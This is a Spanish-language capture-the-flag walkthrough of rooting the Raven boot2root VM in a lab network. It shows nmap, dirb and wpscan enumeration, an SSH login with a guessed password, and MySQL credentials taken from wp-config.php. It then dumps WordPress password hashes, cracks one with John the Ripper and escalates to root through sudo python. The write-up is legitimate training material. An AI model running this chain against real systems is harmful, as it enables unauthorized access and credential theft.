Primero haré un escaneo haciendo un ping a todas las maquinas que están conectadas a este segmento de red
└─$ nmap -sP 10.0.2.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-02 15:02 -05
Nmap scan report for 10.0.2.1
Host is up (0.0016s latency).
Nmap scan report for 10.0.2.11
Host is up (0.0010s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00056s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.59 seconds
Luego de encontrar información sobre ese objetivo.
─$ sudo nmap -sV -O 10.0.2.11
Starting Nmap ( https://nmap.org ) at 2021-08-02 15:05 -05
Nmap scan report for 10.0.2.11
Host is up (0.00056s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
MAC Address: **:**:**:**:**:** (***)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ahora se escanea las paths disponibles, mientras se da un peqeño vistaso al servicio que esta corriendo por el puerto 80.El escaner arrojo algo similar a esto.
└─$ dirb http://10.0.2.11:80
-----------------
DIRB
By The Dark Raver
-----------------
START_TIME: Tue Aug 2 15:20:51 2021
URL_BASE: http://10.0.2.11:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.2.11:80/ ----
==> DIRECTORY: http://10.0.2.11:80/css/
==> DIRECTORY: http://10.0.2.11:80/fonts/
==> DIRECTORY: http://10.0.2.11:80/img/
+ http://10.0.2.11:80/index.html (CODE:200|SIZE:16819)
==> DIRECTORY: http://10.0.2.11:80/js/
==> DIRECTORY: http://10.0.2.11:80/manual/
+ http://10.0.2.11:80/server-status (CODE:403|SIZE:297)
==> DIRECTORY: http://10.0.2.11:80/vendor/
==> DIRECTORY: http://10.0.2.11:80/wordpress/
...
Ahora que se sabe que es hay un blog basado en worpress se podra intentar escanearlo mediante una herramienta llamada wpscan.
└─$ wpscan --url http://10.0.2.11:80/wordpress/ --wp-content-dir -ep -et -eu
...
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.0.2.11/wordpress/ [10.0.2.11]
[+] Started: Tue Aug 2 15:40:13 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.0.2.11/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.0.2.11/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.0.2.11/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
...
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <==========================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] michael
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] steven
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
...
Se ha encontrado 2 usuarios en el sistema, ahora intento ingresar con fuerza bruta con las posibles contraseñas.
└─$ ssh michael@10.0.2.11
The authenticity of host '10.0.2.11 (10.0.2.11)' can't be established.
...
michael@10.0.2.11's password: michael
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
michael@Raven:~$
Ahora a explorar, existe otro usuario steve, al revisar ficheros a simple vista no se encontro nada llamativo, al revisar los grupos en los que pertenecia este usuario no habia nada muy revelador
michael@Raven:/etc$ id
uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Bueno al revisar las conexiones de red, se encontro esto
michael@Raven:/etc$ netstat -putana
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:44713 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 10.0.2.11:22 10.0.2.15:39360 ESTABLISHED -
tcp6 0 0 :::60971 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 0.0.0.0:52685 0.0.0.0:* -
udp 0 0 0.0.0.0:1000 0.0.0.0:* -
udp 0 0 127.0.0.1:1010 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:13162 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp6 0 0 :::1000 :::* -
udp6 0 0 :::48931 :::* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::41844 :::* -
El puerto 3306 es de mysql, el 22 es el de ssh, entre otros. Revisando los servicios que estan corriendo en la maquina
michael@Raven:/etc$ systemctl status
● Raven
State: running
Jobs: 0 queued
Failed: 0 units
Since: Wed 2022-08-03 01:00:46 AEST; 2h 42min ago
CGroup: /
├─1 /sbin/init
└─system.slice
├─dbus.service
│ └─433 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
├─cron.service
│ └─425 /usr/sbin/cron -f
├─nfs-common.service
│ ├─410 /sbin/rpc.statd
│ └─424 /usr/sbin/rpc.idmapd
...
├─apache2.service
├─networking.service
│ └─378 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
...
├─mysql.service
│ ├─538 /bin/sh /usr/bin/mysqld_safe
│ └─932 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-
...
├─sendmail.service
│ └─574 sendmail: MTA: accepting connections
Buscando en las carpetas encontre una flag
michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
Encontre en que el servicio mail estaba enviando correos, ahora al ir a la carpeta de wordpress y examinar la carpeta de configuracion, se encuentra algunas pistas
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
/** MySQL hostname */
define('DB_HOST', 'localhost');
Y con estas, se puede acceder a la base de datos desde la consola, se va a buscar los usuarios guardados en worpress
michael@Raven:/var/www/html/wordpress$ mysql -u root -p
Enter password: R@v3nSecurity
Welcome to the MySQL monitor. Commands end with ; or \g.
...
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Ahora a
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.03 sec)
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
Guardando en un archivo el hash de la clave de steven, porque la de michael ya la tenemos, se usara john the ripper para crackear ese hash
└─$ john user_hash
Created directory: /home/aka-linux/.john
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
pink84 (?)
...
Teniendo la contraseña, pink84, se accede al usuario steven.
michael@Raven:/var/www/html/wordpress$ su steven, se revisa los grupos a los que pertenece
Password: pink84
$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
listará los comandos permitidos para el usuario que lo invoca, en este caso python , asi que se va hacer un spawn con python
$ su -l
Password:
su: Authentication failure
$ sudo -l
Matching Defaults entries for steven on raven:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python
$ sudo python -c "import pty; pty.spawn('/bin/bash')"
root@Raven:/var/www/html/wordpress# id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/var/www/html/wordpress#
root@Raven:~# cd
root@Raven:~# cat flag4.txt
______
| ___ \
| |_/ /__ ___ _____ _ __
| // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|
flag4{715dea6c055b9fe3337544932f2941ce}
CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
Muchas gracias a @mccannw que nos brindo esta VM. Hasta la proxima.